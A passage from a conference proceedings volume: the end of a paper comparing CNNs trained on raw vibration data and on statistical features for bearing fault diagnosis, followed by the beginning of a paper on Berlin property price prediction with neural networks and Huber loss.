and labeled with the relevant class. These features are used as input to the CNN for classifying and predicting the fault class. The time domain statistical features we used are the minimum, maximum, mean, standard deviation, root mean square, skewness, kurtosis, crest factor, and form factor of the vibration values, denoted F1 to F9, respectively. These features can be calculated using the Python NumPy and SciPy libraries. After adding fault labels to the dataset, the feature-extracted data has shape (460*10, 10), derived from the DE time series and comprising the nine statistical features F1 to F9 and the fault class. The statistical formulas for the extracted features are shown in Table 2. In the next step, 80% of the data is used for training the CNN model. The performance of the model is assessed using the other 20% of the data as the test set. The details of the sequential CNN used in this experiment are given in Table 3, which lists the types of layers and the number of parameters for each layer. The CNN model is trained on the feature-extracted data for 50 epochs with a batch size of 128.

Table 2. Statistical features used in the study

Statistical feature    Equation
Minimum                $F_1 = \min(x_i)$
Maximum                $F_2 = \max(x_i)$
Mean                   $F_3 = \frac{1}{n}\sum_{i=1}^{n} x_i$
Standard deviation     $F_4 = \sqrt{\frac{\sum_{i=1}^{n}(x_i-\mu)^2}{n-1}}$
Root mean square       $F_5 = \sqrt{\frac{\sum_{i=1}^{n} x_i^2}{n}}$
Skewness               $F_6 = \frac{1}{n}\,\frac{\sum_{i=1}^{n}(x_i-\mu)^3}{\sigma^3}$
Kurtosis               $F_7 = \frac{1}{n}\,\frac{\sum_{i=1}^{n}(x_i-\mu)^4}{\sigma^4}$
Crest factor           $F_8 = \frac{x_{\max}}{x_{\min}}$
Form factor            $F_9 = \frac{x_{\mathrm{rms}}}{\mu}$
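The nine time domain features can be computed per segment along the following lines. This is a sketch, not the study's code: it uses only the standard library so that it runs anywhere, whereas NumPy and SciPy would be the natural choice in practice. The function name is hypothetical, and the crest factor is taken here as the peak value over the RMS, which is the conventional definition and an assumption about the implementation.

```python
import math


def time_domain_features(x):
    """Return the nine time domain features F1..F9 of one signal segment."""
    n = len(x)
    mean = sum(x) / n
    std = math.sqrt(sum((v - mean) ** 2 for v in x) / (n - 1))  # sample standard deviation
    rms = math.sqrt(sum(v * v for v in x) / n)
    skewness = sum((v - mean) ** 3 for v in x) / (n * std ** 3)
    kurtosis = sum((v - mean) ** 4 for v in x) / (n * std ** 4)
    return {
        "min": min(x),
        "max": max(x),
        "mean": mean,
        "std": std,
        "rms": rms,
        "skewness": skewness,
        "kurtosis": kurtosis,
        "crest": max(x) / rms,   # assumption: peak over RMS
        "form": rms / mean,      # undefined when the segment mean is zero
    }


# Hypothetical segment, not taken from the CWRU data.
features = time_domain_features([1.0, 2.0, 3.0, 4.0, 5.0])
for name, value in features.items():
    print(f"{name}: {value:.4f}")
```

Applying the function to every 1024-point segment and appending the class label gives one row of the feature table per segment.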
Table 3. CNN structure for experiment on statistical feature data

Layer              Output shape          Number of parameters*
Conv2d             (none, 28, 28, 6)     156
Max_pooling2d      (none, 14, 14, 6)     0
Conv2d_1           (none, 10, 10, 16)    2416
Max_pooling2d_1    (none, 5, 5, 16)      0
flatten            (none, 400)           0
dense              (none, 120)           48120
Dense_1            (none, 84)            10164
Dense_2            (none, 10)            850

* Total parameters: 61,706; trainable parameters: 61,706; non-trainable parameters: 0
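The layer-wise parameter counts in Tables 1 and 3 can be checked with the standard formulas for convolutional and dense layers. The kernel sizes (9 × 9 and 5 × 5), the single-channel 32 × 32 input, unit stride, no padding, and 2 × 2 pooling are not stated in the text; they are assumptions inferred from the reported output shapes and counts.

```python
def conv2d_params(kernel, in_channels, filters):
    """Weights plus one bias per filter for a square kernel."""
    return kernel * kernel * in_channels * filters + filters


def dense_params(inputs, units):
    """Weights plus one bias per unit."""
    return inputs * units + units


def conv2d_output(size, kernel):
    """Spatial output size for stride 1 and no padding."""
    return size - kernel + 1


# Table 1 (raw data): assumed 32x32x1 input and 9x9 kernels.
table1 = [
    conv2d_params(9, 1, 32),    # Conv2d
    conv2d_params(9, 32, 32),   # Conv2d_1
    dense_params(128, 64),      # dense, fed by the 2*2*32 flattened output
    dense_params(64, 96),       # Dense_1
    dense_params(96, 10),       # Dense_2
]

# Table 3 (statistical features): assumed 32x32x1 input and 5x5 kernels.
table3 = [
    conv2d_params(5, 1, 6),     # Conv2d
    conv2d_params(5, 6, 16),    # Conv2d_1
    dense_params(400, 120),     # dense, fed by the 5*5*16 flattened output
    dense_params(120, 84),      # Dense_1
    dense_params(84, 10),       # Dense_2
]

print(table1, sum(table1))
print(table3, sum(table3))
```

Under these assumptions the totals come to 101,066 and 61,706, and the spatial sizes follow 32 → 24 → 12 → 4 → 2 and 32 → 28 → 14 → 10 → 5 after each convolution and pooling step.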
5 Results
The model performance metrics we used are the average accuracy, the receiver operating characteristic curve (ROC) value, and the F1 score. ROC values lie between 0 and 1, and values closer to 1 indicate that the model is better at distinguishing among the classes in a multi-class classification problem. The F1 score is the harmonic mean of the recall and precision of a classifier and is a more reliable metric for performance assessment than the average accuracy of the model [26]. The CNN performance results for both experiments are shown in Table 4.

Table 4. CNN performance on raw data and statistical feature data

Loop iteration      Experiment 1 accuracy    Experiment 2 accuracy
1                   0.9859                   0.9728
2                   0.9870                   0.9522
3                   0.9880                   0.9554
4                   0.9793                   0.9543
5                   0.9815                   0.9717
6                   0.9859                   0.9696
7                   0.9880                   0.9674
8                   0.9913                   0.9804
9                   0.9859                   0.9598
10                  0.9913                   0.9609
Average accuracy    0.9864 ± 0.0036          0.9645 ± 0.0088
ROC                 0.9951                   0.9891
F1 Score            0.9913                   0.9804
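The summary rows of Table 4 can be reproduced from the ten per-iteration accuracies. In the sketch below the accuracies are copied from the table. That the reported spread matches the population standard deviation is an observation from the arithmetic, not something the study states. The `f1_score` helper and its inputs are purely illustrative.

```python
from statistics import mean, pstdev

# Per-iteration test accuracies copied from Table 4.
experiment_1 = [0.9859, 0.9870, 0.9880, 0.9793, 0.9815,
                0.9859, 0.9880, 0.9913, 0.9859, 0.9913]
experiment_2 = [0.9728, 0.9522, 0.9554, 0.9543, 0.9717,
                0.9696, 0.9674, 0.9804, 0.9598, 0.9609]


def f1_score(precision, recall):
    """Harmonic mean of precision and recall."""
    return 2 * precision * recall / (precision + recall)


mean_1, spread_1 = mean(experiment_1), pstdev(experiment_1)
mean_2, spread_2 = mean(experiment_2), pstdev(experiment_2)

print(f"Experiment 1: {mean_1:.4f} +/- {spread_1:.4f}")
print(f"Experiment 2: {mean_2:.4f} +/- {spread_2:.4f}")
print(f"F1 for hypothetical precision 0.5 and recall 1.0: {f1_score(0.5, 1.0):.4f}")
```

The harmonic mean penalizes an imbalance between precision and recall, which is why the F1 score is often preferred to plain accuracy for multi-class problems.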
In experiment one, we trained the CNN model on the raw segmented data. The average model accuracy is 0.9864 with a standard deviation of 0.0036. The ROC and F1 score values are also high, at 0.9951 and 0.9913. The results show that the CNN model was capable of producing reasonably good classification results even though it was trained on raw data without any specific preprocessing method. In experiment two, we trained the CNN model on the nine statistical features that were extracted from each row of signal data. This adds an extra data preprocessing step, which requires more time and computational resources. For this experiment, the average model accuracy is 0.9645 with a standard deviation of 0.0088. The ROC and F1 scores are 0.9891 and 0.9804. While comparable with the results from experiment one, all model performance values are slightly lower for the CNN developed on the statistical features.
This result is significant since previous studies have shown that ML methods perform better when trained on feature data than on raw signal data. However, the results of this study show that the CNN performs better when trained on raw data. This is consistent with the challenge mentioned previously, namely that there is no single rule for the number or type of features that produces the highest-performing models for fault diagnosis.
6 Conclusion
This study conducted an empirical assessment of the application and performance of convolutional neural networks in bearing fault diagnosis, using the Case Western Reserve University benchmark dataset for 48 kHz data. We trained two multi-class convolutional neural networks, one on raw data and one on time domain statistical features extracted from the vibration signals, for nine types of faults and the normal bearing condition. The results show that the convolutional neural network trained on raw data gives superior results in multi-class bearing fault classification, owing to its capability to automatically extract the most important features for distinguishing among the output classes. The results suggest that deep learning models such as convolutional neural networks can be used as a reliable fault detection and classification approach for condition monitoring, because they require less data preprocessing and preparation than methods in which data transformation is required for model training, such as conventional machine learning modeling. Future work includes developing other deep learning algorithms to provide a comprehensive comparative study of such methods in fault diagnosis and condition monitoring of induction motors.
References
1. Cerrada, M., et al.: A review on data-driven fault severity assessment in rolling bearings. Mech. Syst. Sig. Process. 99, 169–196 (2018). https://doi.org/10.1016/j.ymssp.2017.06.012
2. Lu, C., Wang, Y., Ragulskis, M., Cheng, Y.: Fault diagnosis for rotating machinery: a method based on image processing. PLoS ONE 11(10), 1–22 (2016). https://doi.org/10.1371/journal.pone.0164111
3. Choudhary, A., Goyal, D., Shimi, S.L., Akula, A.: Condition monitoring and fault diagnosis of induction motors: a review. Arch. Comput. Methods Eng. 26(4), 1221–1238 (2018). https://doi.org/10.1007/s11831-018-9286-z
4. Duan, Z., Wu, T., Guo, S., Shao, T., Malekian, R., Li, Z.: Development and trend of condition monitoring and fault diagnosis of multi-sensors information fusion for rolling bearings: a review. Int. J. Adv. Manuf. Technol. 96(1–4), 803–819 (2018). https://doi.org/10.1007/s00170-017-1474-8
5. Sugumaran, V., Ramachandran, K.I.: Effect of number of features on classification of roller bearing faults using SVM and PSVM. Expert Syst. Appl. 38(4), 4088–4096 (2011). https://doi.org/10.1016/j.eswa.2010.09.072
6. Moghadam, A., Kakhki, F.D.: Comparative study of decision tree models for bearing fault detection and classification. Intell. Hum. Syst. Integr. (IHSI 2022) Integr. People Intell. Syst. vol. 22, no. Ihsi 2022, (2022). https://doi.org/10.54941/ahfe100968
7. Russo, D., Ahram, T., Karwowski, W., Di Bucchianico, G., Taiar, R. (eds.): IHSI 2021. AISC, vol. 1322. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-68017-6
8. Toma, R.N., et al.: A bearing fault classification framework based on image encoding techniques and a convolutional neural network under different operating conditions. Sensors 22, 4881 (2022). https://www.mdpi.com/1424-8220/22/13/4881
9. Li, C., Cabrera, D., De Oliveira, J.V., Sanchez, R.V., Cerrada, M., Zurita, G.: Extracting repetitive transients for rotating machinery diagnosis using multiscale clustered grey infogram. Mech. Syst. Sig. Process. 76–77, 157–173 (2016). https://doi.org/10.1016/j.ymssp.2016.02.064
10. Li, C., Sanchez, V., Zurita, G., Lozada, M.C., Cabrera, D.: Rolling element bearing defect detection using the generalized synchrosqueezing transform guided by time-frequency ridge enhancement. ISA Trans. 60, 274–284 (2016). https://doi.org/10.1016/j.isatra.2015.10.014
11. Li, C., et al.: Observer-biased bearing condition monitoring: from fault detection to multifault classification. Eng. Appl. Artif. Intell. 50, 287–301 (2016). https://doi.org/10.1016/j.engappai.2016.01.038
12. Yang, Y., Fu, P., He, Y.: Bearing fault automatic classification based on deep learning. IEEE Access 6, 71540–71554 (2018). https://doi.org/10.1109/ACCESS.2018.2880990
13. Islam, M.M.M., Kim, J.M.: Automated bearing fault diagnosis scheme using 2D representation of wavelet packet transform and deep convolutional neural network. Comput. Ind. 106, 142–153 (2019). https://doi.org/10.1016/j.compind.2019.01.008
14. Zhang, Y., Ren, Z., Zhou, S.: A new deep convolutional domain adaptation network for bearing fault diagnosis under different working conditions. Shock Vib. 2020 (2020). https://doi.org/10.1155/2020/8850976
15. Atmani, Y., Rechak, S., Mesloub, A., Hemmouche, L.: Enhancement in bearing fault classification parameters using gaussian mixture models and mel frequency cepstral coefficients features. Arch. Acoust. 45(2), 283–295 (2020). https://doi.org/10.24425/aoa.2020.133149
16. Badarinath, P.V., Chierichetti, M., Kakhki, F.D.: A machine learning approach as a surrogate for a finite element analysis: status of research and application to one dimensional systems. Sensors 21(5), 1–18 (2021). https://doi.org/10.3390/s21051654
17. Soualhi, A., Medjaher, K., Zerhouni, N.: Bearing health monitoring based on hilbert-huang transform, support vector machine, and regression. IEEE Trans. Instrum. Meas. 64(1), 52–62 (2015). https://doi.org/10.1109/TIM.2014.2330494
18. Prieto, M.D., Cirrincione, G., Espinosa, A.G., Ortega, J.A., Henao, H.: Bearing fault detection by a novel condition-monitoring scheme based on statistical-time features and neural networks. IEEE Trans. Ind. Electron. 60(8), 3398–3407 (2013). https://doi.org/10.1109/TIE.2012.2219838
19. Toma, R.N., Prosvirin, A.E., Kim, J.M.: Bearing fault diagnosis of induction motors using a genetic algorithm and machine learning classifiers. Sensors (Switz) 20(7), 1884 (2020). https://doi.org/10.3390/s20071884
20. Hoang, D.T., Kang, H.J.: A survey on deep learning based bearing fault diagnosis. Neurocomputing 335, 327–335 (2019). https://doi.org/10.1016/j.neucom.2018.06.078
21. Kakhki, F.D., Freeman, S.A., Mosher, G.A.: Use of neural networks to identify safety prevention priorities in agro-manufacturing operations within commercial grain elevators. Appl. Sci. 9, 4690 (2019). https://doi.org/10.3390/app9214690
22. Yedla, A., Kakhki, F.D., Jannesari, A.: Predictive modeling for occupational safety outcomes and days away from work analysis in mining operations. Int. J. Environ. Res. Public Health 17(19), 1–17 (2020). https://doi.org/10.3390/ijerph17197054
23. Zhang, D., Zhou, T.: Deep convolutional neural network using transfer learning for fault diagnosis. IEEE Access 9, 43889–43897 (2021). https://doi.org/10.1109/ACCESS.2021.3061530
24. Zhang, J., Zhou, Y., Wang, B., Wu, Z.: Bearing fault diagnosis base on multi-scale 2D-CNN model. In: Proceedings of 2021 3rd International Conference on Machine Learning Big Data Bus. Intell. MLBDBI 2021, no. June 2020, pp. 72–75 (2021). https://doi.org/10.1109/MLBDBI54094.2021.00021
25. Alzubaidi, L., et al.: Review of deep learning: concepts, CNN architectures, challenges, applications, future directions. J. Big Data 8, 1–74 (2021)
26. Kakhki, F.D., Freeman, S.A., Mosher, G.A.: Evaluating machine learning performance in predicting injury severity in agribusiness industries. Saf. Sci. 117, 257–262 (2019). https://doi.org/10.1016/j.ssci.2019.04.026
Huber Loss and Neural Networks Application in Property Price Prediction
Alexander I. Iliev1,2(B) and Amruth Anand1,2
1 SRH Berlin University, Charlottenburg, Germany
[email protected]
2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, Sofia, Bulgaria
Abstract. In this paper we explore the real estate market in Germany. In particular, we take a dataset of Berlin properties and apply various advanced neural network and optimisation techniques to it. It is always difficult for people to estimate the best price for a property, because many categorical and numerical features are involved. The main challenge is to choose the model and the loss function, and to customise the neural network so that it fits the marketplace data best. We have developed a project that can be used to predict property prices in Berlin. First, we procured current online market prices of properties by web scraping. We then carried out intensive exploratory data analysis and prepared the data for the experiments. Next, we built four different models, looked for the loss function that suits them best, and tabulated the mean squared and mean absolute errors. Finally, we tested our models on properties currently on the market and plotted sample results. This methodology can be applied efficiently, and the results can be used by people who are interested in investing in real estate in Berlin, Germany.
Keywords: Huber loss · Hyperparameter tuning · Exploratory data analysis · Recurrent neural nets · Convolution neural nets · Deep neural nets
1 Introduction
Real estate is a great investment option, but investing in a property in Germany is difficult because of the lack of visibility into market data. In this paper we aim to build an AI model that helps decide the most suitable price for a property in Berlin [1–5]. We hypothesize that the Huber loss function suits real estate data best. We tested this hypothesis with different neural network models and compared the Huber loss with a standard mean squared error loss function. During these experiments we also compared different neural network architectures to see which suits the data best. Section 2 covers data collection and exploratory data analysis. Section 3 discusses the neural network models used in the experiments and the optimization choices made for them. Section 4 presents and discusses our findings. Section 5 states our conclusions and suggests scope for future improvement.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 242–256, 2023. https://doi.org/10.1007/978-3-031-28073-3_17
2 About the Data
We collected the data by scraping open online resources; before scraping, we checked the robots.txt of each website. After scraping we had 15,177 properties to work with, and after exploratory data analysis we ended up with 12,743 properties. A heatmap of the data is shown in Fig. 1.
Fig. 1. Heat map of dataset
2.1 Data Preparation
Data preparation plays a very important role in every machine learning and artificial intelligence project, especially when building a dataset from scratch. Since we gathered the information online by web scraping, much of the data was unstructured, and we cleaned it in Python to give it a proper structure. The features we considered for each property are purchase price, living space, number of rooms, floor of the apartment, number of floors in the apartment, construction year, renovation year, list of features in the property, postcode, category to which the property belongs, balcony, garden, terrace, lift, guest toilet, heating type, furnishing quality, garage space, and address of the property. Since most of the above-mentioned features were not provided online, we had to exclude them, and some features were removed because they were correlated, as seen in Fig. 2 [6]. After removing the null data, we investigated the outliers and removed them as a first step, using boxplots to identify them. We considered any point lying more than 1.5 times the interquartile range above the third quartile, or more than 1.5 times the interquartile range below the first quartile, to be an outlier. For some important features such as purchase price, the data were right-skewed, so we applied log1p to bring the distribution closer to normal, as seen in Fig. 3.
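The quartile rule and the log transform described above can be sketched as follows. This is a minimal illustration using only the Python standard library; the price values are made up, and the quartile convention (`method="inclusive"`) is an assumption, since the text does not state how the quartiles were computed.

```python
import math
import statistics


def iqr_bounds(values, k=1.5):
    """Return the fences Q1 - k*IQR and Q3 + k*IQR used by a boxplot."""
    q1, _, q3 = statistics.quantiles(values, n=4, method="inclusive")
    iqr = q3 - q1
    return q1 - k * iqr, q3 + k * iqr


def remove_outliers(values, k=1.5):
    """Keep only the values that lie inside the boxplot fences."""
    lower, upper = iqr_bounds(values, k)
    return [v for v in values if lower <= v <= upper]


# Hypothetical purchase prices with one extreme listing (illustration only).
prices = [180_000, 210_000, 250_000, 265_000, 300_000, 320_000, 350_000, 4_500_000]

kept = remove_outliers(prices)
# log1p(x) = log(1 + x) compresses the long right tail of the price distribution.
log_prices = [math.log1p(p) for p in kept]

print(len(prices) - len(kept), "outlier(s) removed")
```

The transform is invertible with `math.expm1`, so predictions made on the log scale can be mapped back to prices.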
Fig. 2. Heat map for features correlation
Fig. 3. Normalization
Similarly, we applied different techniques to different features. One important point worth mentioning is that a log transform needs to be applied to all the features associated with the purchase price. During EDA we gained many insights into the real estate market in Berlin.
3 Neural Network Models
We built three different types of neural network model to examine how each behaves on our data: a simple deep neural network, a recurrent neural network [7], and a convolution neural network. We adjusted these networks to work on a regression problem, as we have in this case.
3.1 Deep Neural Network
A deep neural network is a popular choice for regression problems. We used a five-layer neural network model for our 12,743 data points, which is shown in Fig. 4. We chose five layers following the rule of thumb that the number of hidden layers should be less than twice the size of the input layer; we have 13 features, hence five layers. Initially we experimented with three layers, but the model did not seem to learn properly. We also tried four layers, but five layers performed best. For the number of hidden neurons, the rule of thumb is that it should lie between the size of the input layer and the size of the output layer. Finding the best sizes is, however, always an iterative process of trial and error. In our model we used 600, 450, 300, 100, and 50 neurons in the hidden layers, followed by one final output layer.
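To give a sense of the size of this architecture, the sketch below counts the trainable parameters of a fully connected network with 13 inputs, the five hidden widths listed above and a single output. It assumes plain dense layers with one bias per neuron, which the text does not state explicitly.

```python
def dense_param_count(layer_sizes):
    """Weights plus biases of consecutive fully connected layers."""
    return sum(n_in * n_out + n_out
               for n_in, n_out in zip(layer_sizes, layer_sizes[1:]))


# 13 input features, five hidden layers, one linear output neuron.
layer_sizes = [13, 600, 450, 300, 100, 50, 1]
total_params = dense_param_count(layer_sizes)
print(total_params)  # 449351
```

With roughly 450,000 parameters against 12,743 samples, the loss curves discussed later are a useful check for overfitting.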
Fig. 4. Deep neural network model
We used the ReLU activation function. Activation functions control how well the neural network model learns from the training dataset. As can be seen in Fig. 4, we did not use an activation function for the output layer, because the model has to solve a regression problem. We chose the rectified linear unit (ReLU) because we use five layers and would expect vanishing gradients with other activation functions. ReLU mitigates this problem and helps the model learn quickly and perform well.
Optimization is the procedure by which a neural network changes its weights, and possibly its learning rate, in order to reduce the loss; a good optimizer also yields results much faster [8]. We used the Adam optimizer [9], which combines two gradient descent methodologies:
• Gradient descent with momentum
• Root Mean Square Propagation (RMSprop)
Adam (Adaptive Moment Estimation) is an optimization algorithm based on gradient descent. It is efficient for large problems involving a lot of data or parameters, and it requires little memory.
The cost function, popularly called the loss function, plays a very important role in the behaviour of the model, so it is important to select the best loss function for the model. For our regression problem we had a few options and experimented with two of them: mean squared error and Huber loss.
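For reference, a single-parameter sketch of the Adam update rule [9] is given below. It shows how the momentum term (first moment) and the RMSprop-style term (second moment) are combined. The default values of `beta1`, `beta2` and `eps` follow the Adam paper; the toy objective and the learning rate of 0.05 are assumptions chosen only for illustration and are not the settings used in the experiments.

```python
import math


def adam_minimize(grad, theta, steps, lr=0.001, beta1=0.9, beta2=0.999, eps=1e-8):
    """Minimise a one-dimensional function given its gradient, using Adam."""
    m = 0.0  # first moment: running mean of gradients (momentum)
    v = 0.0  # second moment: running mean of squared gradients (RMSprop)
    for t in range(1, steps + 1):
        g = grad(theta)
        m = beta1 * m + (1 - beta1) * g
        v = beta2 * v + (1 - beta2) * g * g
        m_hat = m / (1 - beta1 ** t)  # bias correction for the zero initialisation
        v_hat = v / (1 - beta2 ** t)
        theta -= lr * m_hat / (math.sqrt(v_hat) + eps)
    return theta


# Toy objective f(theta) = (theta - 3)^2 with gradient 2 * (theta - 3).
theta_final = adam_minimize(lambda th: 2.0 * (th - 3.0), theta=0.0, steps=2000, lr=0.05)
print(theta_final)
```

The only state kept per parameter is the pair `m` and `v`, which is why the memory overhead is small.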
Mean squared error is the mean of the squared distances between the target values and the predicted values:
$$\mathrm{MSE} = \frac{1}{n} \sum_{i=1}^{n} \left( y_i - y_i^{p} \right)^2$$
where MSE = mean squared error, n = number of data points, $y_i$ = observed value, and $y_i^{p}$ = predicted value.
Fig. 5. Loss function MSE
As explained above, we used this loss in our code, shown in Fig. 5. To monitor the performance of the model we used the mean absolute error (MAE) as a metric, although other metrics could have been used. For this model we obtained a mean squared error of 0.17 and a mean absolute error of 0.27. Since this is a regression problem, we cannot rely on the metrics alone; we also need to see how well the model has learnt.
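The two quantities reported here can be computed as in the following sketch. The observed and predicted values are made-up log prices used only to show the arithmetic; they are not taken from the experiments.

```python
def mean_squared_error(observed, predicted):
    """Mean of the squared differences between observed and predicted values."""
    return sum((y - p) ** 2 for y, p in zip(observed, predicted)) / len(observed)


def mean_absolute_error(observed, predicted):
    """Mean of the absolute differences between observed and predicted values."""
    return sum(abs(y - p) for y, p in zip(observed, predicted)) / len(observed)


observed = [8.5, 8.4, 7.7, 7.9]   # hypothetical log prices
predicted = [8.6, 8.2, 7.7, 8.3]  # hypothetical model outputs

mse = mean_squared_error(observed, predicted)
mae = mean_absolute_error(observed, predicted)
print(round(mse, 4), round(mae, 4))
```

Because the errors are squared, the single error of 0.4 contributes most of the MSE, while the MAE weights all errors linearly.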
Fig. 6. Loss curve ANN MSE
The graph in Fig. 6 shows that the model is not learning as expected, so we decided to change the loss function and train the same model again. For this experiment we used the Huber loss function:
$$L_\delta(y, f(x)) = \begin{cases} \frac{1}{2}\,(y - f(x))^2 & \text{for } |y - f(x)| \le \delta, \\ \delta\,|y - f(x)| - \frac{1}{2}\,\delta^2 & \text{otherwise.} \end{cases}$$
The formula says that if the error is small, we take the first case, which is the squared error divided by 2; otherwise we take the second case, which grows only linearly with the error.
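A direct transcription of the Huber loss for a single prediction is sketched below, next to half the squared error for comparison. The value `delta=1.0` is an arbitrary choice for this illustration.

```python
def huber_loss(y_true, y_pred, delta):
    """Quadratic for errors up to delta, linear beyond it."""
    error = abs(y_true - y_pred)
    if error <= delta:
        return 0.5 * error ** 2
    return delta * error - 0.5 * delta ** 2


# Compare half the squared error with the Huber loss for growing errors.
for error in (0.5, 1.0, 3.0):
    squared = 0.5 * error ** 2
    print(error, squared, huber_loss(error, 0.0, delta=1.0))
```

Both branches agree at an error of exactly delta, so the loss is continuous; beyond delta a large error is penalised much less than under the squared error, which is what makes the loss robust to outliers.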
Here we need to define the delta. To select it we used hyperparameter tuning, as shown in Fig. 7, with GridSearchCV from scikit-learn. GridSearchCV loops through the predefined hyperparameter values and fits the model on our training set for each of them.
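The idea behind such a search can be sketched without any library: every candidate delta is scored by cross-validation and the best one is kept. The sketch below is a hand-written stand-in for GridSearchCV, not the code of Fig. 7. The "model" is deliberately trivial (one constant prediction fitted by gradient descent), and the targets, the grid and the fold count are all assumptions for illustration.

```python
def huber_gradient(error, delta):
    """Derivative of the Huber loss w.r.t. the prediction (error = prediction - target)."""
    if abs(error) <= delta:
        return error
    return delta if error > 0 else -delta


def fit_constant(targets, delta, lr=0.1, steps=500):
    """Toy model: a single constant fitted by gradient descent on the mean Huber loss."""
    prediction = sum(targets) / len(targets)
    for _ in range(steps):
        grad = sum(huber_gradient(prediction - y, delta) for y in targets) / len(targets)
        prediction -= lr * grad
    return prediction


def cross_validated_mae(targets, delta, folds=4):
    """Average validation MAE over the folds for one candidate delta."""
    fold_scores = []
    for fold in range(folds):
        train = [y for i, y in enumerate(targets) if i % folds != fold]
        valid = [y for i, y in enumerate(targets) if i % folds == fold]
        prediction = fit_constant(train, delta)
        fold_scores.append(sum(abs(y - prediction) for y in valid) / len(valid))
    return sum(fold_scores) / folds


# Made-up log prices with two unusually expensive listings.
targets = [8.1, 8.3, 8.2, 8.4, 8.0, 8.5, 8.3, 8.2, 11.9, 8.4, 8.1, 12.4]
delta_grid = [0.25, 0.5, 1.0, 1.75, 2.5]

scores = {delta: cross_validated_mae(targets, delta) for delta in delta_grid}
best_delta = min(scores, key=scores.get)
print(best_delta, scores[best_delta])
```

Which delta wins depends entirely on the data and on the validation metric, so the value selected on this toy data says nothing about the value found for the real dataset.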
Fig. 7. Hyperparameter tuning for delta in huber loss
With this experiment we found that the best delta value for our training data is 1.75. We then applied this loss function to our model and trained it again, as seen in Fig. 8:
Fig. 8. Loss function huber loss
Using this, we obtained a mean squared error of 0.21 and a mean absolute error of 0.31. More interestingly, the model now learns steadily with every epoch, and the loss curve shows no noise.
Fig. 9. Loss curve ANN huber loss
As the graph in Fig. 9 shows, the model's learning has improved drastically. Using the Huber loss was therefore the best option for our training data. Huber loss is less sensitive to outliers, and in real estate some data points do behave as outliers.
With mean squared error, the gradient decreases as the loss gets closer to the minimum, which makes it more precise; the Huber loss also curves around the minimum, so its gradient decreases there as well.
3.2 Recurrent Neural Network
Our model for the recurrent neural network is displayed in Fig. 10. An RNN is also a reasonably good choice for house price prediction, as this type of model is designed for sequential data. A standard feed-forward network has two problems with such data:
• Inputs and outputs can have different shapes
• It does not share features learnt across different positions
In an RNN, the parameters used at each time step are shared. The connection from the input x to the hidden layer is governed by a set of parameters that we write as W_ax, and the same W_ax is used at every time step. The activations, that is, the horizontal connections, are governed by a set of parameters W_aa, which is likewise the same at every time step. So, in this recurrent neural network, the prediction at a given time step uses information not only from the input at that step but also from the inputs at earlier steps, because that information is passed along through the hidden activations.
Fig. 10. RNN forward propagation
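The activation in an RNN is usually tanh. ReLU is sometimes used as well, but tanh is the common choice, and there are other ways of preventing the vanishing gradient problem. The output activation depends on the type of output y: a sigmoid function for binary classification, or softmax for K-way classification.
Simplified RNN notation:
$$a^{\langle t \rangle} = g\left( W_{aa}\, a^{\langle t-1 \rangle} + W_{ax}\, x^{\langle t \rangle} + b_a \right)$$
Let us say that a is 100-dimensional and x is 10,000-dimensional. Then $W_{aa}$ has shape (100, 100) and $W_{ax}$ has shape (100, 10000). Stacking them horizontally gives $W_a = [\, W_{aa} \;\; W_{ax} \,]$ with shape (100, 10100). Similarly, the two vectors are stacked vertically:
$$\left[ a^{\langle t-1 \rangle},\, x^{\langle t \rangle} \right] = \begin{bmatrix} a^{\langle t-1 \rangle} \\ x^{\langle t \rangle} \end{bmatrix}$$
Finally,
$$[\, W_{aa} \;\; W_{ax} \,] \begin{bmatrix} a^{\langle t-1 \rangle} \\ x^{\langle t \rangle} \end{bmatrix} = W_{aa}\, a^{\langle t-1 \rangle} + W_{ax}\, x^{\langle t \rangle}$$
Therefore, more generally, we end up with these equations:
$$a^{\langle t \rangle} = g\left( W_{ax}\, x^{\langle t \rangle} + W_{aa}\, a^{\langle t-1 \rangle} + b_a \right) \quad \text{(tanh/ReLU)}$$
$$\hat{y}^{\langle t \rangle} = g\left( W_{ya}\, a^{\langle t \rangle} + b_y \right) \quad \text{(sigmoid)}$$
To perform back propagation, we need a cost function, here the cross entropy. For one element of the sequence:
$$L^{\langle t \rangle}\left( \hat{y}^{\langle t \rangle}, y^{\langle t \rangle} \right) = -y^{\langle t \rangle} \log \hat{y}^{\langle t \rangle} - \left( 1 - y^{\langle t \rangle} \right) \log\left( 1 - \hat{y}^{\langle t \rangle} \right)$$
The overall loss function, which is the one used for back propagation through time, is:
$$L(\hat{y}, y) = \sum_{t=1}^{T_y} L^{\langle t \rangle}\left( \hat{y}^{\langle t \rangle}, y^{\langle t \rangle} \right)$$
Here, we have four types of RNN:
1. One-to-One
2. One-to-Many
3. Many-to-One
4. Many-to-Many
For our use case of price prediction we used Many-to-One. Our RNN code snippet is shown in Fig. 11.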
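The recurrence and the many-to-one arrangement can be illustrated with a small pure-Python sketch. It is not the model of Fig. 11: the weights, the two hidden units, the output weights `w_y` and the three-step input sequence are all hypothetical, and the output is linear because the task is regression.

```python
import math


def matvec(matrix, vector):
    """Multiply a matrix (list of rows) by a vector."""
    return [sum(w * v for w, v in zip(row, vector)) for row in matrix]


def rnn_step(a_prev, x_t, W_aa, W_ax, b_a):
    """One time step: a<t> = tanh(W_aa a<t-1> + W_ax x<t> + b_a)."""
    pre = [h + i + b for h, i, b in zip(matvec(W_aa, a_prev), matvec(W_ax, x_t), b_a)]
    return [math.tanh(z) for z in pre]


def many_to_one(xs, W_aa, W_ax, b_a, w_y, b_y):
    """Run the shared-weight recurrence over the sequence, then emit one linear output."""
    a = [0.0] * len(b_a)
    for x_t in xs:
        a = rnn_step(a, x_t, W_aa, W_ax, b_a)
    return sum(w * h for w, h in zip(w_y, a)) + b_y


# Hypothetical parameters: 2 hidden units, 1 input feature per time step.
W_aa = [[0.5, 0.0], [0.0, 0.5]]
W_ax = [[1.0], [-1.0]]
b_a = [0.0, 0.0]
w_y = [1.0, -1.0]
b_y = 0.0

# Stacked form W_a = [W_aa | W_ax], applied to the concatenation [a<t-1>; x<t>].
W_a = [row_a + row_x for row_a, row_x in zip(W_aa, W_ax)]

xs = [[0.1], [0.2], [0.3]]
y_hat = many_to_one(xs, W_aa, W_ax, b_a, w_y, b_y)
print(y_hat)
```

The same `W_aa`, `W_ax` and `b_a` are reused at every step, which is the parameter sharing described in the text, and `matvec(W_a, a_prev + x_t)` gives the same pre-activation as the two separate products.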
